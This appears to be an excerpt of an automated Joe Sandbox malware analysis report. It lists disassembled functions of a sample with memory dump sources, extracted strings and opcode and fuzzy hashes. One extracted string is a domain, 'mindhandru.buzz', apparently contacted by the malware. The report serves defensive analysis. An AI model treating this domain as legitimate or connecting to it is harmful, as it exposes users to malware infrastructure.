                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /<<|$1/V?$Ub?^$WbyN
                                                      • API String ID: 0-240682121
                                                      • Opcode ID: 5d42bfd1c5b644d2e5ee862c5a79a5b638d9fca14ecebb66b780501a293928a0
                                                      • Instruction ID: d31437a93a5ee55d8b8efcd2a20e4c77e73e6640313624e9fa8f9cefd82693e8
                                                      • Opcode Fuzzy Hash: 5d42bfd1c5b644d2e5ee862c5a79a5b638d9fca14ecebb66b780501a293928a0
                                                      • Instruction Fuzzy Hash: EB82F9F360C6049FE3046E29EC8567AFBE5EFD4320F1A493DE6C4C7744EA7558058692
                                                      Function 00101340 Relevance: 5.5, Strings: 4, Instructions: 493COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9deZ$eb$sp${s
                                                      • API String ID: 0-3993331145
                                                      • Opcode ID: 2f4cd7cb4ad9784aab7470f7558c79b28b8f761f1f843c2080f33ce3912e2f61
                                                      • Instruction ID: 4b5fb8e09c397ff61d321eb01f7c4746bc8336df9e0e24d223868d683e65d705
                                                      • Opcode Fuzzy Hash: 2f4cd7cb4ad9784aab7470f7558c79b28b8f761f1f843c2080f33ce3912e2f61
                                                      • Instruction Fuzzy Hash: A9D1D3B16183149BC728DF24C8A166BB7F2FFD5354F089A1CE5D68B3A0E7B89904C752
                                                      Function 001091AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 001091DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: +Ku$wpq
                                                      • API String ID: 237503144-1953850642
                                                      • Opcode ID: 3b46baa60008cec3f9cd920fb1770a3cc6c2fb1cade7b03781f02b05b546f10c
                                                      • Instruction ID: a38ab84e84b125bf75d57a451fa571a9f73124d4310d9bee6c9d900e7d90ee40
                                                      • Opcode Fuzzy Hash: 3b46baa60008cec3f9cd920fb1770a3cc6c2fb1cade7b03781f02b05b546f10c
                                                      • Instruction Fuzzy Hash: 7451BC7220C3528FC324CF29984076FB6E2EBC5310F55892DE4EACB2C5DB70D50A8B92
                                                      Function 001090D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00109170
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentExpandStrings
                                                      • String ID: M/($M/(
                                                      • API String ID: 237503144-1710806632
                                                      • Opcode ID: 97f7ebf1a3d8b3ea617f783344dcb9776c5543b9f32e63a64d720b486bb134d3
                                                      • Instruction ID: 79d4e2e1cfa8083f73e8ae7a923cc233af9d9928e9bc1ad3a05d081400a68a03
                                                      • Opcode Fuzzy Hash: 97f7ebf1a3d8b3ea617f783344dcb9776c5543b9f32e63a64d720b486bb134d3
                                                      • Instruction Fuzzy Hash: FE21237165C3515FE714CE34988179FB7AAEBC6710F01892CE0D1DB1C5D675884B8752
                                                      Function 0010A5B6 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: VN$VN$i$i
                                                      • API String ID: 0-1885346908
                                                      • Opcode ID: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                      • Instruction ID: eb70193155177858ac3b5460303c81f78c146adb57e9d66470e8f7f3e87a0e48
                                                      • Opcode Fuzzy Hash: f2560a5eb87e48c54c403f4c235dd9b7370a68364d9f3f272869781b585ee5e7
                                                      • Instruction Fuzzy Hash: 8521F3311083808AD3058E6588402A7BBE3BFC6328F68465ED1F15B3D1EB7BC90A8757
                                                      Function 0029E4BF Relevance: 4.7, Strings: 3, Instructions: 910COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 81Z{$<f^C$J.%p
                                                      • API String ID: 0-2957531361
                                                      • Opcode ID: f1c1968e56dd115c224491eca36548a3351200538961db5502ba738f5ce89de6
                                                      • Instruction ID: e10b16e8163693821952d599d2259a101eccc5926a88f2005d5603ad10dad178
                                                      • Opcode Fuzzy Hash: f1c1968e56dd115c224491eca36548a3351200538961db5502ba738f5ce89de6
                                                      • Instruction Fuzzy Hash: A05209F3A0C2049FE3146E29EC4677BB7E9EB94720F16453DEAC5C3740EA3558058697
                                                      Function 0010A0CA Relevance: 4.1, Strings: 3, Instructions: 336COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .txt$<\hX$_^]\
                                                      • API String ID: 0-3117400391
                                                      • Opcode ID: d04f15bb4110fd6939654e1821a766e5756d4a7dcdc1229004c82e7269b1f0ec
                                                      • Instruction ID: c58ad869ec37503394f776c41b115d9592691749962cafbbb7c29197ebeeb4a6
                                                      • Opcode Fuzzy Hash: d04f15bb4110fd6939654e1821a766e5756d4a7dcdc1229004c82e7269b1f0ec
                                                      • Instruction Fuzzy Hash: 4CC1237050C381EFD718DF28D85166BBBE2AF85310F488A6CF0D5472E2D77599A6CB12
                                                      Function 000ED4F3 Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Fm$V]$mindhandru.buzz
                                                      • API String ID: 0-77585785
                                                      • Opcode ID: d8a79bb51d80734ad85f5c7fc640bbd9a4568f2761e1b9f98aced4fbafbdb672
                                                      • Instruction ID: af682c6f886fdd294b20eb0fa3f122a4d556b998e482844664f1ddc39c0558b3
                                                      • Opcode Fuzzy Hash: d8a79bb51d80734ad85f5c7fc640bbd9a4568f2761e1b9f98aced4fbafbdb672
                                                      • Instruction Fuzzy Hash: 5591B0B62557808FD325CF2AC480656BFE2EF9631872D869DC0955F766C33AE807CB50
                                                      Function 000FD003 Relevance: 3.4, Strings: 2, Instructions: 883COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [V$bh
                                                      • API String ID: 0-2174178241
                                                      • Opcode ID: c6418c527fd98ecb0a39fc35801ce8805c5747098a3d846afd5bcd864822881a
                                                      • Instruction ID: be82d8862c577159f4290cbaf8d0fe9a8edc0377a5b57c831934a56bf290a58b
                                                      • Opcode Fuzzy Hash: c6418c527fd98ecb0a39fc35801ce8805c5747098a3d846afd5bcd864822881a
                                                      • Instruction Fuzzy Hash: 8F3269B1901715CBCB24CF28C8916B7B7F2FFA5310F18825DD9969B790E738A942DB90
                                                      Function 001493C0 Relevance: 3.1, Strings: 2, Instructions: 616COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 9HGg$o@v
                                                      • API String ID: 0-3886043323
                                                      • Opcode ID: 7c5f1bfe93074a70b5e6b022e2102c508fb810dee516d27bba5344c1a7db6f61
                                                      • Instruction ID: 49268d5c6be6f2c13535b8ee6a9cbcf48d8a19472b66ec57e928d12fac2fe40f
                                                      • Opcode Fuzzy Hash: 7c5f1bfe93074a70b5e6b022e2102c508fb810dee516d27bba5344c1a7db6f61
                                                      • Instruction Fuzzy Hash: AD12AEF3F151214BF3584938CDA83667692DBD4320F2F82398B99ABBC9D97E5D064384
                                                      Function 001C027C Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ok$/qw
                                                      • API String ID: 0-3917829760
                                                      • Opcode ID: c6989c3db82a11f3bfb30d562b5985aa1270aa3096b156ee54445fe9dc67c9ba
                                                      • Instruction ID: ca88d87082e2905d91c76ae1c532f030e1598305c5048883d1023b0c66ba6d09
                                                      • Opcode Fuzzy Hash: c6989c3db82a11f3bfb30d562b5985aa1270aa3096b156ee54445fe9dc67c9ba
                                                      • Instruction Fuzzy Hash: 5CF1F0F3F012294BF3544928DD59362B683DBD4324F2F82398E5DAB7C9E97E5D068284
                                                      Function 000F961B Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &$wt
                                                      • API String ID: 0-2890898390
                                                      • Opcode ID: bd051d39f6af925a808e72b0427b622752a6f1ef0c2072f79d78dee953fdf51e
                                                      • Instruction ID: 052dcdb8b2a11b1fe4f78d3282c3b503a6412e86fe8f32d3d745cd3d2f913ae2
                                                      • Opcode Fuzzy Hash: bd051d39f6af925a808e72b0427b622752a6f1ef0c2072f79d78dee953fdf51e
                                                      • Instruction Fuzzy Hash: E581477150C3808BD725CF29C4517BBBBE1EFDA324F195A1CE4DA9B292E7348805CB86
                                                      Function 000E4270 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1734869128.00000000000E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1734849899.00000000000E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734869128.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734937069.0000000000133000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.0000000000135000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000002BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.000000000039E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1734954076.00000000003DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735229024.00000000003DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735332309.000000000057C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1735344922.000000000057D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e0000_PH1D3KHmOD.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$IEND
                                                      • API String ID: 0-707183367
                                                      • Opcode ID: 1a860b5c64b84ed600f203c875f6faaa750c10c745fc96d916bbc0f24c8aefd4
                                                      • Instruction ID: 9a76cf48a7f017e8cd2a85d63867182bcb702885fac9ccfaa6940cec166b737f
                                                      • Opcode Fuzzy Hash: 1a860b5c64b84ed600f203c875f6faaa750c10c745fc96d916bbc0f24c8aefd4
                                                      • Instruction Fuzzy Hash: 0CD180B1908384DFD720CF25D845B9FBBE4AB94304F14492DF999AB382D775E908CB92
